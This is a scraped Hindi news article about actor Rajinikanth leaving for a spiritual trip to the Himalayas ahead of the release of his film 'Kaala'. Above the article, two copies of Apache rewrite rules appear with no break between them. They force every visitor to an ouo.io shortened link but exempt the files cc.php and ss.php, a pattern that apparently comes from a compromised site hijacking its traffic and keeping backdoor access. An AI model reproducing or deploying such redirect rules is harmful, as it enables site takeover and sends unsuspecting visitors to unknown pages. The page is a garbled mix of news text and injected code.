
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 324
Nextमुंबई। फिल्मों के बाद राजनीति की दुनिया में चमकने को तैयार दिग्गज अभिनेता रजनीकांत फिलहाल हिमालय की यात्रा पर निकल रहे हैं। ऐसा नहीं है कि वे सार्वजनिक जीवन से संन्यास लेने जा रहे हैं। लेकिन फिलहाल वे कामकाज से छुट्टी लेकर इस यात्रा पर निकल रहे हैं, जहां वह कुछ सुकून भरा वक्त गुजारेंगे। इस बात की जानकारी उनके पब्लिसिस्ट रियाज के.अहमद ने सोशल मीडिया पर भी शेयर की है। ऐसा बताया जा रहा है कि सुपरस्टार अक्सर वहां जाते रहते हैं। रजनीकांत के पब्लिसिस्ट ने ट्वीट कर बताया है कि 'थलैवा' कल हिमालय की ओर निकलने वाले हैं। दरअसल सुपरस्टार के बारे में खबर हैं कि उन्होंने हिमालय में अपने दोस्तों के साथ मिलकर एक मेडिटेशन सेंटर बनाया है। वह वहीं जा रहे हैं। वहां से वह आध्यात्मिक यात्रा पर जाते हैं लेकिन इस बार वह अपने राजनीतिक भविष्य के लिए गुरुओं से आशीर्वाद और उनकी सलाह लेंगे। बता दें कि सुपरस्टार की फिल्म ‘काला’ 27 अप्रैल को रिलीज हो रही है। फिल्म का टीजर पहले ही रिलीज हो चुका है और रजनीकांत के फैन्स के बीच उनका क्रेज एक बार फिर सिर चढ़कर बोलने लगा है। ऐसे में फिल्म के हिट होने की उम्मीद पहले ही जताई जा रही है। इसके बाद उनकी अगली फिल्म '2.0' भी रिलीज होगी, हालांकि इसकी रिलीज डेट सामने नहीं आई है।